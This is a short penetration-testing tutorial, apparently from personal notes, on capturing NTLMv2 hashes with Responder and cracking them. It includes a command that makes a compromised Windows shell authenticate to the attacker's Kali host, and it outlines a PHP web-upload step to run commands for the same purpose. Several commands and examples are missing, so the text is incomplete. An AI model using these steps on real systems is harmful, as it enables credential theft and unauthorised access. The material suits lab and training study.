Capturing and cracking NTLMv2 hash.
Purpose
Suppose you got the shell as user named as bittu . This User is a member of remote Desktop user. This means you can easy get the RDP Access if you have Credential for bittu User. So, For the same reason we will capture the NTLMv2 hash and crack it or pass it to get the access to the user.
This is also userful when we don't have rights to run the mimikatz on the machine.
[SMB share] Steps for capturing and Cracking NTLMv2 hash (SMB)
Step 1: Start the responder on kali
To capture the SMB request, We need responder to be set up in kali Linux.
# Start responder
sudo responder -I <YouVPNTunnelInterface>
# Example:
# sudo responder -I tun0Step 2: Make a fake request for share
Make a fake request for share From the shell. So, Your NTLMv2 Hash is captured in responder.
# Run below command in Shell.
dir \\IP_KALI\FakeShareStep 3: Store hash and crack it
Store hash in a file and then use below command to crack.
If cracked then..
Note: If you can upload file to a web then upload file which can run command and then run command to get the ntlmv2 hash.
[Website-Upload] Steps and example of exploiting Web upload for hash
Step 1: Find upload directory or place from where you can upload file.
You can use go buster and look at the found directory.
Step 2: Upload the file
Suppose that you found that php is support then upload PHP file using which we can run command from URL.
Step 3: Start the responder on kali
To capture the request, We need responder to be set up in kali Linux.
Step 4: Capture the request using burp suite and change it's file name
Original file:
Modifiy name like this...
You will see NTLMv2 hash in responder.
Store the hash in file named as user.hash
Step 5: Cracking the hash
to see hash value
Last updated